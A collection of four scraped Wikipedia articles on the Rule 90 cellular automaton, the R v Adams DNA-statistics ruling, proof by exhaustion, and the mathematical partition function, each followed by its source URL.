Some of the earliest studies of Rule 90 were made in connection with an unsolved problem innumber theory,Gilbreath's conjecture, on the differences of consecutiveprime numbers.
This rule is also connected to number theory in a different way, viaGould's sequence. This sequence counts the number of nonzero cells in each time step after starting Rule 90 with a single live cell.
Its values arepowers of two, with exponents equal to the number of nonzero digits in thebinary representationof the step number. Other applications of Rule 90 have included the design oftapestries.
Every configuration of Rule 90 has exactly four predecessors, other configurations that form the given configuration after a single step. Therefore, in contrast to many other cellular automata such asConway's Game of Life, Rule 90 has noGarden of Eden, a configuration with no predecessors. It provides an example of a cellular automaton that issurjective(each configuration has a predecessor) but notinjective(it has sets of more than one configuration with the same successor). It follows from theGarden of Eden theoremthat Rule 90 is locally injective (all configurations with the same successor vary at an infinite number of cells).
Rule 90 is anelementary cellular automaton. That means that it consists of a one-dimensional array of cells, each of which holds a single binary value, either 0 or 1. An assignment of values to all of the cells is called aconfiguration. The automaton is given an initial configuration, and then progresses through other configurations in a sequence of discrete time steps. At each step, all cells are updated simultaneously. A pre-specified rule determines the new value of each cell as a function of its previous value and of the values in its two neighboring cells. All cells obey the same rule, which may be given either as a formula or as a rule table that specifies the new value for each possible combination of neighboring values.[1]
In the case of Rule 90, each cell's new value is theexclusive orof the two neighboring values. Equivalently, the next state of this particular automaton is governed by the following rule table:[1]
The name of Rule 90 comes fromStephen Wolfram'sbinary-decimal notationfor one-dimensional cellular automaton rules. To calculate the notation for the rule, concatenate the new states in the rule table into a singlebinary number, and convert the number intodecimal: 010110102= 9010.[1]Rule 90 has also been called theSierpiński automaton, due to the characteristicSierpiński triangleshape it generates,[4]and theMartin–Odlyzko–Wolfram cellular automatonafter the early research of Olivier Martin,Andrew M. Odlyzko, andStephen Wolfram(1984) on this automaton.[5]
A configuration in Rule 90 can be partitioned into two subsets of cells that do not interact with each other. One of these two subsets consists of the cells in even positions at even time steps and the cells in odd positions in odd time steps. The other subset consists of the cells in even positions at odd time steps and the cells in odd positions at even time steps. Each of these two subsets can be viewed as a cellular automaton with only its half of the cells.[6]The rule for the automaton within each of these subsets is equivalent (except for a shift by half a cell per time step) to anotherelementary cellular automaton,Rule 102, in which the new state of each cell is the exclusive or of its old state and its right neighbor. That is, the behavior of Rule 90 is essentially the same as the behavior of two interleaved copies of Rule 102.[7]
Rule 90 and Rule 102 are calledadditive cellular automata. This means that, if two initial states are combined by computing the exclusive or of each their states, then their subsequent configurations will be combined in the same way. More generally, one can partition any configuration of Rule 90 into two subsets with disjoint nonzero cells, evolve the two subsets separately, and compute each successive configuration of the original automaton as the exclusive or of the configurations on the same time steps of the two subsets.[2]
The Rule 90 automaton (in its equivalent form on one of the two independent subsets of alternating cells) was investigated in the early 1970s, in an attempt to gain additional insight intoGilbreath's conjectureon the differences of consecutiveprime numbers. In the triangle of numbers generated from the primes by repeatedly applying theforward difference operator, it appears that most values are either 0 or 2. In particular, Gilbreath's conjecture asserts that the leftmost values in each row of this triangle are all 0 or 2. When a contiguous subsequence of values in one row of the triangle are all 0 or 2, then Rule 90 can be used to determine the corresponding subsequence in the next row.Miller (1970)explained the rule by a metaphor of tree growth in a forest, entitling his paper on the subject "Periodic forests of stunted trees". In this metaphor, a tree begins growing at each position of the initial configuration whose value is 1, and this forest of trees then grows simultaneously, to a new height above the ground at each time step. Each nonzero cell at each time step represents a position that is occupied by a growing tree branch. At each successive time step, a branch can grow into one of the two cells above it to its left and right only when there is no other branch competing for the same cell. A forest of trees growing according to these rules has exactly the same behavior as Rule 90.[8]
From any initial configuration of Rule 90, one may form amathematical forest, adirected acyclic graphin which everyvertexhas at most one outgoing edge, whose trees are the same as the trees in Miller's metaphor. The forest has a vertex for each pair(x,i)such that cellxis nonzero at timei. The vertices at time 0 have no outgoing edges; each one forms the root of a tree in the forest. For each vertex(x,i)withinonzero, its outgoing edge goes to(x± 1,i− 1), the unique nonzero neighbor ofxin time stepi− 1. Miller observed that these forests develop triangular "clearings", regions of the time-space diagram with no nonzero cells bounded by a flat bottom edge and diagonal sides. Such a clearing is formed when a consecutive sequence of cells becomes zero simultaneously in one time step, and then (in the tree metaphor) branches grow inwards, eventually re-covering the cells of the sequence.[8]
For random initial conditions, the boundaries between the trees formed in this way themselves shift in a seemingly random pattern, and trees frequently die out altogether. But by means of the theory ofshift registershe and others were able to find initial conditions in which the trees all remain alive forever, the pattern of growth repeats periodically, and all of the clearings can be guaranteed to remain bounded in size.[8][9]Miller used these repeating patterns to form the designs oftapestries. Some of Miller's tapestries depict physical trees; others visualize the Rule 90 automaton using abstract patterns of triangles.[8]
The time-space diagram of Rule 90 is a plot in which theith row records the configuration of the automaton at stepi. When the initial state has a single nonzero cell, this diagram has the appearance of theSierpiński triangle, afractalformed by combiningtrianglesinto larger triangles. Rules 18, 22, 26, 82, 146, 154, 210 and 218 also generate Sierpinski triangles from a single cell, however not all of these are created completely identically. One way to explain this structure uses the fact that, in Rule 90, each cell is theexclusive orof its two neighbors. Because this is equivalent tomodulo-2 addition, this generates the modulo-2 version ofPascal's triangle. The diagram has a 1 wherever Pascal's triangle has anodd number, and a 0 wherever Pascal's triangle has aneven number. This is a discrete version of the Sierpiński triangle.[1][10]
The number of live cells in each row of this pattern is apower of two. In theith row, it equals2k, wherekis the number of nonzero digits in thebinary representationof the numberi. The sequence of these numbers of live cells,
is known asGould's sequence.
The single live cell of the starting configuration is asawtooth pattern. This means that in some time steps the numbers of live cells grow arbitrarily large while in others they return to only two live cells, infinitely often.
The growth rate of this pattern has a characteristic growingsawtooth waveshape that can be used to recognize physical processes that behave similarly to Rule 90.[4]
The Sierpiński triangle also occurs in a more subtle way in the evolution of any configuration in Rule 90. At any time stepiin the Rule's evolution, the state of any cell can be calculated as the exclusive or of a subset of the cells in the initial configuration. That subset has the same shape as theith row of the Sierpiński triangle.[11]
In the Sierpiński triangle, for any integeri, the rows numbered by multiples of2ihave nonzero cells spaced at least2iunits apart. Therefore, because of the additive property of Rule 90, if an initial configuration consists of a finite patternPof nonzero cells with width less than2i, then in steps that are multiples of2i, the configuration will consist of copies ofPspaced at least2iunits from start to start. This spacing is wide enough to prevent the copies from interfering with each other. The number of copies is the same as the number of nonzero cells in the corresponding row of the Sierpiński triangle. Thus, in this rule, every pattern is areplicator: it generates multiple copies of itself that spread out across the configuration, eventually filling the whole array. Other rules including theVon Neumann universal constructor,Codd's cellular automaton, andLangton's loopsalso have replicators that work by carrying and copying a sequence of instructions for building themselves. In contrast, the replication in Rule 90 is trivial and automatic.[12]
In Rule 90, on an infinite one-dimensional lattice, every configuration has exactly four predecessor configurations. This is because, in a predecessor, any two consecutive cells may have any combination of states, but once those two cells' states are chosen, there is only one consistent choice for the states of the remaining cells. Therefore, there is noGarden of Edenin Rule 90, a configuration with no predecessors. The Rule 90 configuration consisting of a single nonzero cell (with all other cells zero) has no predecessors that have finitely many nonzeros. However, this configuration is not a Garden of Eden because it does have predecessors with infinitely many nonzeros.[13]
The fact that every configuration has a predecessor may be summarized by saying that Rule 90 issurjective. The function that maps each configuration to its successor is, mathematically, a surjective function. Rule 90 is also notinjective. In an injective rule, every two different configurations have different successors, but Rule 90 has pairs of configurations with the same successor. Rule 90 provides an example of a cellular automaton that is surjective but not injective. TheGarden of Eden theoremof Moore and Myhill implies that every injective cellular automaton must be surjective, but this example shows that the converse is not true.[13][14]
Because each configuration has only a bounded number of predecessors, the evolution of Rule 90 preserves theentropyof any configuration. In particular, if an infinite initial configuration is selected by choosing the state of each cell independently at random, with each of the two states being equally likely to be selected, then each subsequent configuration can be described by exactly the same probability distribution.[2]
Many other cellular automata and other computational systems are capable of emulating the behavior of Rule 90. For instance, a configuration in rule 90 may be translated into a configuration into the different elementary cellular automaton Rule 22. The translation replaces each Rule 90 cell by three consecutive Rule 22 cells. These cells are all zero if the Rule 90 cell is itself zero. A nonzero Rule 90 cell is translated into a one followed by two zeros. With this transformation, every six steps of the Rule 22 automaton simulate a single step of the Rule 90 automaton. Similar direct simulations of Rule 90 are also possible for the elementary cellular automata Rule 45 and Rule 126, for certainstring rewriting systemsandtag systems, and in some two-dimensional cellular automata includingWireworld. Rule 90 can also simulate itself in the same way. If each cell of a Rule 90 configuration is replaced by a pair of consecutive cells, the first containing the original cell's value and the second containing zero, then this doubled configuration has the same behavior as the original configuration at half the speed.[15]
Various other cellular automata are known to support replicators, patterns that make copies of themselves, and most share the same behavior as in the tree growth model for Rule 90. A new copy is placed to either side of the replicator pattern, as long as the space there is empty. However, if two replicators both attempt to copy themselves into the same position, then the space remains blank. In either case the replicators themselves vanish, leaving their copies to carry on the replication. A standard example of this behavior is the "bowtie pasta" pattern in the two-dimensionalHighLiferule. This rule behaves in many ways like Conway's Game of Life, but such a small replicator does not exist in Life. Whenever an automaton supports replicators with the same growth pattern, one-dimensional arrays of replicators can be used to simulate Rule 90.[16]Rule 90 (on finite rows of cells) can also be simulated by the blockoscillatorsof the two-dimensionalLife-like cellular automatonB36/S125, also called "2x2", and the behavior of Rule 90 can be used to characterize the possible periods of these oscillators.[17]
|
https://en.wikipedia.org/wiki/Rule_90
|
R v Adams[1996]EWCACrim 10 and 222, are rulings in the United Kingdom that banned the expression in court of headline (soundbite), standaloneBayesian statisticsfrom thereasoningadmissible before ajuryinDNA evidencecases, in favour of the calculated average (and maximal) number of matching incidences among the nation's population. The facts involved strong but inconclusive evidence conflicting with the DNA evidence, leading to aretrial.
A rape victim described her attacker as in his twenties. A suspect, Denis Adams, wasarrestedand anidentity paradewas arranged. The woman failed to pick him out, and on being asked if he fitted her description replied in the negative. She had described a man in his twenties and when asked how old Adams looked, she replied about forty. Adams was 37; he had analibifor the night in question, his girlfriend saying he had spent the night with her. The DNA was the only incriminating evidence heard by the jury, as all the other evidence pointed towards innocence.
TheDNA profileof the suspect fitted that ofevidenceleft at the scene. Thedefenceargued that the matchprobabilityfigure put forward by the prosecution (1 in 200 million) was incorrect, and that a figure of 1 in 20 million, or perhaps even 1 in 2 million, was more appropriate. The issue of how the jury should resolve the conflicting evidence was addressed by the defence by a formalstatistical method. The jury was instructed in the use ofBayes's theoremby ProfessorPeter DonnellyofOxford University. The judge told the jury they could use Bayes's theorem if they wished. Adams was convicted and the case went to appeal. TheAppeal Courtjudges noted that the original trial judge did not direct the jury as to what to do if they did not wish to use Bayes's theorem and ordered a retrial.
At the retrial the defence team again wanted to instruct the new jury in the use of Bayes's theorem (though Prof. Donnelly had doubts about the practicality of the approach).[1]The judge asked that the statistical experts from both sides work together to produce a workable method of implementing Bayes's theorem for use in a courtroom, should the jury wish to use it. Aquestionnairewas produced which asked a series of questions such as:
These questions were intended to allow theBayes factorsof the various pieces of evidence to be assessed. The questionnaires had boxes where jurors could put their assessments and a formula to enable them to produce the overalloddsofguiltorinnocence. Adams was convicted once again and again an appeal was made to the Court of Appeal. The appeal was unsuccessful but the Appeal Court ruling was highly critical of the appropriateness of Bayes's theorem in the courtroom.
The only evidence against Adams was the DNA evidence. His age was substantially different from that reported by the victim, the victim did not identify him and he had an alibi which was never disproved. The 1 in 200 million match probability calculation did not allow for the fact that the perpetrator might be a close relative of the defendant – an important point, since the defendant had a half-brother in his 20s whose DNA was never tested.
The Court of Appeal after the appeal wrote the guidelines for the way that match probabilities should be explained to jurors. Judges should say something along the lines of the following.
|
https://en.wikipedia.org/wiki/R_v_Adams
|
Proof by exhaustion, also known asproof by cases,proof by case analysis,complete inductionor thebrute force method, is a method ofmathematical proofin which the statement to be proved is split into a finite number of cases or sets of equivalent cases, and where each type of case is checked to see if the proposition in question holds.[1]This is a method ofdirect proof. A proof by exhaustion typically contains two stages:
The prevalence of digitalcomputershas greatly increased the convenience of using the method of exhaustion (e.g., the first computer-assisted proof offour color theoremin 1976), though such approaches can also be challenged on the basis ofmathematical elegance.Expert systemscan be used to arrive at answers to many of the questions posed to them. In theory, the proof by exhaustion method can be used whenever the number of cases is finite. However, because most mathematical sets are infinite, this method is rarely used to derive general mathematical results.[2]
In theCurry–Howard isomorphism, proof by exhaustion and case analysis are related to ML-stylepattern matching.[citation needed]
Proof by exhaustion can be used to prove that if anintegeris aperfect cube, then it must be either a multiple of 9, 1 more than a multiple of 9, or 1 less than a multiple of 9.[3]
Proof:Each perfect cube is the cube of some integern, wherenis either a multiple of 3, 1 more than a multiple of 3, or 1 less than a multiple of 3. So these three cases are exhaustive:
Mathematicians prefer to avoid proofs by exhaustion with large numbers of cases, which are viewed asinelegant. An illustration as to how such proofs might be inelegant is to look at the following proofs that all modernSummer Olympic Gamesare held in years which are divisible by 4:
Proof: Thefirst modern Summer Olympicswere held in 1896, and then every 4 years thereafter (neglecting exceptional situations such as when the games' schedule were disrupted by World War I, World War II and theCOVID-19 pandemic.). Since 1896 = 474 × 4 is divisible by 4, the next Olympics would be in year 474 × 4 + 4 = (474 + 1) × 4, which is also divisible by four, and so on (this is a proof bymathematical induction). Therefore, the statement is proved.
The statement can also be proved by exhaustion by listing out every year in which the Summer Olympics were held, and checking that every one of them can be divided by four. With 28 total Summer Olympics as of 2016, this is a proof by exhaustion with 28 cases.
In addition to being less elegant, the proof by exhaustion will also require an extra case each time a new Summer Olympics is held. This is to be contrasted with the proof by mathematical induction, which proves the statement indefinitely into the future.
There is no upper limit to the number of cases allowed in a proof by exhaustion. Sometimes there are only two or three cases. Sometimes there may be thousands or even millions. For example, rigorously solving achess endgamepuzzlemight involve considering a very large number of possible positions in thegame treeof that problem.
The first proof of thefour colour theoremwas a proof by exhaustion with 1834 cases.[4]This proof was controversial because the majority of the cases were checked by a computer program, not by hand. The shortest known proof of the four colour theorem today still has over 600 cases.
In general the probability of an error in the whole proof increases with the number of cases. A proof with a large number of cases leaves an impression that the theorem is only true by coincidence, and not because of some underlying principle or connection. Other types of proofs—such as proof by induction (mathematical induction)—are considered moreelegant. However, there are some important theorems for which no other method of proof has been found, such as
|
https://en.wikipedia.org/wiki/Proof_by_exhaustion
|
Thepartition functionorconfiguration integral, as used inprobability theory,information theoryanddynamical systems, is a generalization of the definition of apartition function in statistical mechanics. It is a special case of anormalizing constantin probability theory, for theBoltzmann distribution. The partition function occurs in many problems of probability theory because, in situations where there is a natural symmetry, its associatedprobability measure, theGibbs measure, has theMarkov property. This means that the partition function occurs not only in physical systems with translation symmetry, but also in such varied settings as neural networks (theHopfield network), and applications such asgenomics,corpus linguisticsandartificial intelligence, which employMarkov networks, andMarkov logic networks. The Gibbs measure is also the unique measure that has the property of maximizing theentropyfor a fixed expectation value of the energy; this underlies the appearance of the partition function inmaximum entropy methodsand the algorithms derived therefrom.
The partition function ties together many different concepts, and thus offers a general framework in which many different kinds of quantities may be calculated. In particular, it shows how to calculateexpectation valuesandGreen's functions, forming a bridge toFredholm theory. It also provides a natural setting for theinformation geometryapproach to information theory, where theFisher information metriccan be understood to be acorrelation functionderived from the partition function; it happens to define aRiemannian manifold.
When the setting for random variables is oncomplex projective spaceorprojective Hilbert space, geometrized with theFubini–Study metric, the theory ofquantum mechanicsand more generallyquantum field theoryresults. In these theories, the partition function is heavily exploited in thepath integral formulation, with great success, leading to many formulas nearly identical to those reviewed here. However, because the underlying measure space is complex-valued, as opposed to the real-valuedsimplexof probability theory, an extra factor ofiappears in many formulas. Tracking this factor is troublesome, and is not done here. This article focuses primarily on classical probability theory, where the sum of probabilities total to one.
Given a set ofrandom variablesXi{\displaystyle X_{i}}taking on valuesxi{\displaystyle x_{i}}, and some sort ofpotential functionorHamiltonianH(x1,x2,…){\displaystyle H(x_{1},x_{2},\dots )}, the partition function is defined as
Z(β)=∑xiexp(−βH(x1,x2,…)){\displaystyle Z(\beta )=\sum _{x_{i}}\exp \left(-\beta H(x_{1},x_{2},\dots )\right)}
The functionHis understood to be a real-valued function on the space of states{X1,X2,…}{\displaystyle \{X_{1},X_{2},\dots \}}, whileβ{\displaystyle \beta }is a real-valued free parameter (conventionally, theinverse temperature). The sum over thexi{\displaystyle x_{i}}is understood to be a sum over all possible values that each of the random variablesXi{\displaystyle X_{i}}may take. Thus, the sum is to be replaced by anintegralwhen theXi{\displaystyle X_{i}}are continuous, rather than discrete. Thus, one writes
Z(β)=∫exp(−βH(x1,x2,…))dx1dx2⋯{\displaystyle Z(\beta )=\int \exp \left(-\beta H(x_{1},x_{2},\dots )\right)\,dx_{1}\,dx_{2}\cdots }
for the case of continuously-varyingXi{\displaystyle X_{i}}.
WhenHis anobservable, such as a finite-dimensionalmatrixor an infinite-dimensionalHilbert spaceoperatoror element of aC-star algebra, it is common to express the summation as atrace, so that
Z(β)=tr(exp(−βH)){\displaystyle Z(\beta )=\operatorname {tr} \left(\exp \left(-\beta H\right)\right)}
WhenHis infinite-dimensional, then, for the above notation to be valid, the argument must betrace class, that is, of a form such that the summation exists and is bounded.
The number of variablesXi{\displaystyle X_{i}}need not becountable, in which case the sums are to be replaced byfunctional integrals. Although there are many notations for functional integrals, a common one would be
Z=∫Dφexp(−βH[φ]){\displaystyle Z=\int {\mathcal {D}}\varphi \exp \left(-\beta H[\varphi ]\right)}
Such is the case for thepartition function in quantum field theory.
A common, useful modification to the partition function is to introduce auxiliary functions. This allows, for example, the partition function to be used as agenerating functionforcorrelation functions. This is discussed in greater detail below.
The role or meaning of the parameterβ{\displaystyle \beta }can be understood in a variety of different ways. In classical thermodynamics, it is aninverse temperature. More generally, one would say that it is the variable that isconjugateto some (arbitrary) functionH{\displaystyle H}of the random variablesX{\displaystyle X}. The wordconjugatehere is used in the sense of conjugategeneralized coordinatesinLagrangian mechanics, thus, properlyβ{\displaystyle \beta }is aLagrange multiplier. It is not uncommonly called thegeneralized force. All of these concepts have in common the idea that one value is meant to be kept fixed, as others, interconnected in some complicated way, are allowed to vary. In the current case, the value to be kept fixed is theexpectation valueofH{\displaystyle H}, even as many differentprobability distributionscan give rise to exactly this same (fixed) value.
For the general case, one considers a set of functions{Hk(x1,…)}{\displaystyle \{H_{k}(x_{1},\dots )\}}that each depend on the random variablesXi{\displaystyle X_{i}}. These functions are chosen because one wants to hold their expectation values constant, for one reason or another. To constrain the expectation values in this way, one applies the method ofLagrange multipliers. In the general case,maximum entropy methodsillustrate the manner in which this is done.
Some specific examples are in order. In basic thermodynamics problems, when using thecanonical ensemble, the use of just one parameterβ{\displaystyle \beta }reflects the fact that there is only one expectation value that must be held constant: thefree energy(due toconservation of energy). For chemistry problems involving chemical reactions, thegrand canonical ensembleprovides the appropriate foundation, and there are two Lagrange multipliers. One is to hold the energy constant, and another, thefugacity, is to hold the particle count constant (as chemical reactions involve the recombination of a fixed number of atoms).
For the general case, one has
Z(β)=∑xiexp(−∑kβkHk(xi)){\displaystyle Z(\beta )=\sum _{x_{i}}\exp \left(-\sum _{k}\beta _{k}H_{k}(x_{i})\right)}
withβ=(β1,β2,…){\displaystyle \beta =(\beta _{1},\beta _{2},\dots )}a point in a space.
For a collection of observablesHk{\displaystyle H_{k}}, one would write
Z(β)=tr[exp(−∑kβkHk)]{\displaystyle Z(\beta )=\operatorname {tr} \left[\,\exp \left(-\sum _{k}\beta _{k}H_{k}\right)\right]}
As before, it is presumed that the argument oftristrace class.
The correspondingGibbs measurethen provides a probability distribution such that the expectation value of eachHk{\displaystyle H_{k}}is a fixed value. More precisely, one has
∂∂βk(−logZ)=⟨Hk⟩=E[Hk]{\displaystyle {\frac {\partial }{\partial \beta _{k}}}\left(-\log Z\right)=\langle H_{k}\rangle =\mathrm {E} \left[H_{k}\right]}
with the angle brackets⟨Hk⟩{\displaystyle \langle H_{k}\rangle }denoting the expected value ofHk{\displaystyle H_{k}}, andE[⋅]{\displaystyle \operatorname {E} [\,\cdot \,]}being a common alternative notation. A precise definition of this expectation value is given below.
Although the value ofβ{\displaystyle \beta }is commonly taken to be real, it need not be, in general; this is discussed in the sectionNormalizationbelow. The values ofβ{\displaystyle \beta }can be understood to be the coordinates of points in a space; this space is in fact amanifold, as sketched below. The study of these spaces as manifolds constitutes the field ofinformation geometry.
The potential function itself commonly takes the form of a sum:
H(x1,x2,…)=∑sV(s){\displaystyle H(x_{1},x_{2},\dots )=\sum _{s}V(s)\,}
where the sum oversis a sum over some subset of thepower setP(X) of the setX={x1,x2,…}{\displaystyle X=\lbrace x_{1},x_{2},\dots \rbrace }. For example, instatistical mechanics, such as theIsing model, the sum is over pairs of nearest neighbors. In probability theory, such asMarkov networks, the sum might be over thecliquesof a graph; so, for the Ising model and otherlattice models, the maximal cliques are edges.
The fact that the potential function can be written as a sum usually reflects the fact that it is invariant under theactionof agroup symmetry, such astranslational invariance. Such symmetries can be discrete or continuous; they materialize in thecorrelation functionsfor the random variables (discussed below). Thus a symmetry in the Hamiltonian becomes a symmetry of the correlation function (and vice versa).
This symmetry has a critically important interpretation in probability theory: it implies that theGibbs measurehas theMarkov property; that is, it is independent of the random variables in a certain way, or, equivalently, the measure is identical on theequivalence classesof the symmetry. This leads to the widespread appearance of the partition function in problems with the Markov property, such asHopfield networks.
The value of the expressionexp(−βH(x1,x2,…)){\displaystyle \exp \left(-\beta H(x_{1},x_{2},\dots )\right)}
can be interpreted as a likelihood that a specificconfigurationof values(x1,x2,…){\displaystyle (x_{1},x_{2},\dots )}occurs in the system. Thus, given a specific configuration(x1,x2,…){\displaystyle (x_{1},x_{2},\dots )},
P(x1,x2,…)=1Z(β)exp(−βH(x1,x2,…)){\displaystyle P(x_{1},x_{2},\dots )={\frac {1}{Z(\beta )}}\exp \left(-\beta H(x_{1},x_{2},\dots )\right)}
is theprobabilityof the configuration(x1,x2,…){\displaystyle (x_{1},x_{2},\dots )}occurring in the system, which is now properly normalized so that0≤P(x1,x2,…)≤1{\displaystyle 0\leq P(x_{1},x_{2},\dots )\leq 1}, and such that the sum over all configurations totals to one. As such, the partition function can be understood to provide ameasure(aprobability measure) on theprobability space; formally, it is called theGibbs measure. It generalizes the narrower concepts of thegrand canonical ensembleandcanonical ensemblein statistical mechanics.
There exists at least one configuration(x1,x2,…){\displaystyle (x_{1},x_{2},\dots )}for which the probability is maximized; this configuration is conventionally called theground state. If the configuration is unique, the ground state is said to benon-degenerate, and the system is said to beergodic; otherwise the ground state isdegenerate. The ground state may or may not commute with the generators of the symmetry; if commutes, it is said to be aninvariant measure. When it does not commute, the symmetry is said to bespontaneously broken.
Conditions under which a ground state exists and is unique are given by theKarush–Kuhn–Tucker conditions; these conditions are commonly used to justify the use of the Gibbs measure in maximum-entropy problems.[citation needed]
The values taken byβ{\displaystyle \beta }depend on themathematical spaceover which the random field varies. Thus, real-valued random fields take values on asimplex: this is the geometrical way of saying that the sum of probabilities must total to one. For quantum mechanics, the random variables range overcomplex projective space(or complex-valuedprojective Hilbert space), where the random variables are interpreted asprobability amplitudes. The emphasis here is on the wordprojective, as the amplitudes are still normalized to one. The normalization for the potential function is theJacobianfor the appropriate mathematical space: it is 1 for ordinary probabilities, andifor Hilbert space; thus, inquantum field theory, one seesitH{\displaystyle itH}in the exponential, rather thanβH{\displaystyle \beta H}. The partition function is very heavily exploited in thepath integral formulationof quantum field theory, to great effect. The theory there is very nearly identical to that presented here, aside from this difference, and the fact that it is usually formulated on four-dimensional space-time, rather than in a general way.
The partition function is commonly used as aprobability-generating functionforexpectation valuesof various functions of the random variables. So, for example, takingβ{\displaystyle \beta }as an adjustable parameter, then the derivative oflog(Z(β)){\displaystyle \log(Z(\beta ))}with respect toβ{\displaystyle \beta }
E[H]=⟨H⟩=−∂log(Z(β))∂β{\displaystyle \operatorname {E} [H]=\langle H\rangle =-{\frac {\partial \log(Z(\beta ))}{\partial \beta }}}
gives the average (expectation value) ofH. In physics, this would be called the averageenergyof the system.
Given the definition of the probability measure above, the expectation value of any functionfof the random variablesXmay now be written as expected: so, for discrete-valuedX, one writes⟨f⟩=∑xif(x1,x2,…)P(x1,x2,…)=1Z(β)∑xif(x1,x2,…)exp(−βH(x1,x2,…)){\displaystyle {\begin{aligned}\langle f\rangle &=\sum _{x_{i}}f(x_{1},x_{2},\dots )P(x_{1},x_{2},\dots )\\&={\frac {1}{Z(\beta )}}\sum _{x_{i}}f(x_{1},x_{2},\dots )\exp \left(-\beta H(x_{1},x_{2},\dots )\right)\end{aligned}}}
The above notation makes sense for a finite number of discrete random variables. In more general settings, the summations should be replaced with integrals over aprobability space.
Thus, for example, theentropyis given by
S=−kB⟨lnP⟩=−kB∑xiP(x1,x2,…)lnP(x1,x2,…)=kB(β⟨H⟩+logZ(β)){\displaystyle {\begin{aligned}S&=-k_{\text{B}}\langle \ln P\rangle \\[1ex]&=-k_{\text{B}}\sum _{x_{i}}P(x_{1},x_{2},\dots )\ln P(x_{1},x_{2},\dots )\\&=k_{\text{B}}\left(\beta \langle H\rangle +\log Z(\beta )\right)\end{aligned}}}
The Gibbs measure is the unique statistical distribution that maximizes the entropy for a fixed expectation value of the energy; this underlies its use inmaximum entropy methods.
The pointsβ{\displaystyle \beta }can be understood to form a space, and specifically, amanifold. Thus, it is reasonable to ask about the structure of this manifold; this is the task ofinformation geometry.
Multiple derivatives with regard to the Lagrange multipliers gives rise to a positive semi-definitecovariance matrixgij(β)=∂2∂βi∂βj(−logZ(β))=⟨(Hi−⟨Hi⟩)(Hj−⟨Hj⟩)⟩{\displaystyle g_{ij}(\beta )={\frac {\partial ^{2}}{\partial \beta ^{i}\partial \beta ^{j}}}\left(-\log Z(\beta )\right)=\langle \left(H_{i}-\langle H_{i}\rangle \right)\left(H_{j}-\langle H_{j}\rangle \right)\rangle }This matrix is positive semi-definite, and may be interpreted as ametric tensor, specifically, aRiemannian metric. Equipping the space of Lagrange multipliers with a metric in this way turns it into aRiemannian manifold.[1]The study of such manifolds is referred to asinformation geometry; the metric above is theFisher information metric. Here,β{\displaystyle \beta }serves as a coordinate on the manifold. It is interesting to compare the above definition to the simplerFisher information, from which it is inspired.
That the above defines the Fisher information metric can be readily seen by explicitly substituting for the expectation value:gij(β)=⟨(Hi−⟨Hi⟩)(Hj−⟨Hj⟩)⟩=∑xP(x)(Hi−⟨Hi⟩)(Hj−⟨Hj⟩)=∑xP(x)(Hi+∂logZ∂βi)(Hj+∂logZ∂βj)=∑xP(x)∂logP(x)∂βi∂logP(x)∂βj{\displaystyle {\begin{aligned}g_{ij}(\beta )&=\left\langle \left(H_{i}-\left\langle H_{i}\right\rangle \right)\left(H_{j}-\left\langle H_{j}\right\rangle \right)\right\rangle \\&=\sum _{x}P(x)\left(H_{i}-\left\langle H_{i}\right\rangle \right)\left(H_{j}-\left\langle H_{j}\right\rangle \right)\\&=\sum _{x}P(x)\left(H_{i}+{\frac {\partial \log Z}{\partial \beta _{i}}}\right)\left(H_{j}+{\frac {\partial \log Z}{\partial \beta _{j}}}\right)\\&=\sum _{x}P(x){\frac {\partial \log P(x)}{\partial \beta ^{i}}}{\frac {\partial \log P(x)}{\partial \beta ^{j}}}\\\end{aligned}}}
where we've writtenP(x){\displaystyle P(x)}forP(x1,x2,…){\displaystyle P(x_{1},x_{2},\dots )}and the summation is understood to be over all values of all random variablesXk{\displaystyle X_{k}}. For continuous-valued random variables, the summations are replaced by integrals, of course.
Curiously, theFisher information metriccan also be understood as the flat-spaceEuclidean metric, after appropriate change of variables, as described in the main article on it. When theβ{\displaystyle \beta }are complex-valued, the resulting metric is theFubini–Study metric. When written in terms ofmixed states, instead ofpure states, it is known as theBures metric.
By introducing artificial auxiliary functionsJk{\displaystyle J_{k}}into the partition function, it can then be used to obtain the expectation value of the random variables. Thus, for example, by writing
Z(β,J)=Z(β,J1,J2,…)=∑xiexp(−βH(x1,x2,…)+∑nJnxn){\displaystyle {\begin{aligned}Z(\beta ,J)&=Z(\beta ,J_{1},J_{2},\dots )\\&=\sum _{x_{i}}\exp \left(-\beta H(x_{1},x_{2},\dots )+\sum _{n}J_{n}x_{n}\right)\end{aligned}}}
one then hasE[xk]=⟨xk⟩=∂∂JklogZ(β,J)|J=0{\displaystyle \operatorname {E} [x_{k}]=\langle x_{k}\rangle =\left.{\frac {\partial }{\partial J_{k}}}\log Z(\beta ,J)\right|_{J=0}}
as the expectation value ofxk{\displaystyle x_{k}}. In thepath integral formulationofquantum field theory, these auxiliary functions are commonly referred to assource fields.
Multiple differentiations lead to theconnected correlation functionsof the random variables. Thus the correlation functionC(xj,xk){\displaystyle C(x_{j},x_{k})}between variablesxj{\displaystyle x_{j}}andxk{\displaystyle x_{k}}is given by:
C(xj,xk)=∂∂Jj∂∂JklogZ(β,J)|J=0{\displaystyle C(x_{j},x_{k})=\left.{\frac {\partial }{\partial J_{j}}}{\frac {\partial }{\partial J_{k}}}\log Z(\beta ,J)\right|_{J=0}}
For the case whereHcan be written as aquadratic forminvolving adifferential operator, that is, as
H=12∑nxnDxn{\displaystyle H={\frac {1}{2}}\sum _{n}x_{n}Dx_{n}}
then partition function can be understood to be a sum orintegralover Gaussians. The correlation functionC(xj,xk){\displaystyle C(x_{j},x_{k})}can be understood to be theGreen's functionfor the differential operator (and generally giving rise toFredholm theory). In the quantum field theory setting, such functions are referred to aspropagators; higher order correlators are called n-point functions; working with them defines theeffective actionof a theory.
When the random variables are anti-commutingGrassmann numbers, then the partition function can be expressed as a determinant of the operatorD. This is done by writing it as aBerezin integral(also called Grassmann integral).
Partition functions are used to discusscritical scaling,universalityand are subject to therenormalization group.
|
https://en.wikipedia.org/wiki/Partition_function_(mathematics)
|
